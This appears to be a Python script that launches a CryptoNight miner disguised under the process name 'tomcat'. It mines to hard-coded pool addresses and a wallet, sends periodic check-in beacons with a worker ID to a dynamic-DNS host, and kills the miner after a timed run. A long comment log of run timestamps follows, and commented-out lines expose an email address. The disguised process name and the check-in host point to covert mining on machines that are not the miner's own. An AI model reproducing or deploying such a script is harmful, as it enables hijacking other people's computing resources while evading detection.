import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:34:05.381371
#2018-02-17 17:22:01.525001
#2018-02-17 19:11:01.606425
#2018-02-17 20:59:01.417575
#2018-02-17 22:44:06.231524
#2018-02-18 00:29:05.460342
#2018-02-18 02:20:05.097819
#2018-02-18 04:07:05.875378
#2018-02-18 05:57:02.179447
#2018-02-18 07:48:05.558915
#2018-02-18 09:36:04.978199
#2018-02-18 11:22:01.775901
#2018-02-18 13:08:01.891556
#2018-02-18 14:56:06.122653
#2018-02-18 16:44:06.516121
#2018-02-18 18:33:01.660233
#2018-02-18 20:21:05.057137
#2018-02-18 22:07:05.433228
#2018-02-18 23:55:03.396140
#2018-02-19 01:41:07.897794
#2018-02-19 03:29:01.886858
#2018-02-19 05:14:03.399734
#2018-02-19 06:59:07.796257
#2018-02-19 08:48:04.308599
#2018-02-19 10:38:09.213743
#2018-02-19 12:25:04.127888
#2018-02-19 14:12:08.429954
#2018-02-19 16:02:09.277652
#2018-02-19 17:50:12.343389
#2018-02-19 19:37:04.733591
#2018-02-19 21:24:07.487097
#2018-02-19 23:11:08.027585
#2018-02-20 00:56:02.184527
#2018-02-20 02:46:03.614729
#2018-02-20 04:33:07.227486
#2018-02-20 06:17:04.713100
#2018-02-20 08:02:01.444980
#2018-02-20 09:47:01.656158
#2018-02-20 11:31:04.315684
#2018-02-20 13:17:09.493273
#2018-02-20 15:03:04.707354
#2018-02-20 16:48:10.067406
#2018-02-20 18:36:06.426189
#2018-02-20 20:28:06.921979
#2018-02-20 22:15:06.967106
#2018-02-20 23:56:01.408392
#2018-02-21 01:41:06.313981
#2018-02-21 03:29:05.363488
#2018-02-21 05:17:07.496835
#2018-02-21 07:07:04.820123
#2018-02-21 08:53:01.943465
#2018-02-21 10:40:08.560954
#2018-02-21 12:27:06.667118
#2018-02-21 14:14:04.564198
#2018-02-21 16:01:02.230515
#2018-02-21 17:52:01.395795
#2018-02-21 19:37:04.583907
#2018-02-21 21:24:06.688574
#2018-02-21 23:12:03.983668
#2018-02-22 01:03:06.910701
#2018-02-22 02:52:05.344614
#2018-02-22 04:40:05.211648
#2018-02-22 06:24:05.219045
#2018-02-22 08:10:07.417678
#2018-02-22 09:58:04.767988
#2018-02-22 11:43:08.341690
#2018-02-22 13:29:08.402936
#2018-02-22 15:19:08.896522
#2018-02-22 17:06:03.212356
#2018-02-22 18:52:07.803295
#2018-02-22 20:46:02.000041
#2018-02-22 22:31:03.604148
#2018-02-23 00:21:01.720605
#2018-02-23 02:09:03.510239
#2018-02-23 03:57:03.743916
#2018-02-23 05:44:07.556544
#2018-02-23 07:34:07.700459
#2018-02-23 09:37:07.831282
#2018-02-23 11:41:01.228973
#2018-02-23 13:31:01.892322
#2018-02-23 15:17:08.694384
#2018-02-23 17:06:05.732684
#2018-02-23 18:35:07.027549
#2018-02-23 20:21:01.826568
#2018-02-23 21:56:08.375789
#2018-02-23 23:32:07.938615
#2018-02-24 01:02:06.748183
#2018-02-24 02:45:06.957469
#2018-02-24 04:21:01.864934
#2018-02-24 05:51:03.452236
#2018-02-24 07:27:05.187318
#2018-02-24 08:59:04.247370
#2018-02-24 10:46:07.536568
#2018-02-24 12:33:07.019806
#2018-02-24 14:22:01.917459
#2018-02-24 16:08:07.894955
#2018-02-24 17:59:03.924403
#2018-02-24 19:47:06.805619
#2018-02-24 21:32:06.436327
#2018-02-25 00:19:03.504617
#2018-02-25 04:07:04.976671
#2018-02-25 07:38:04.065681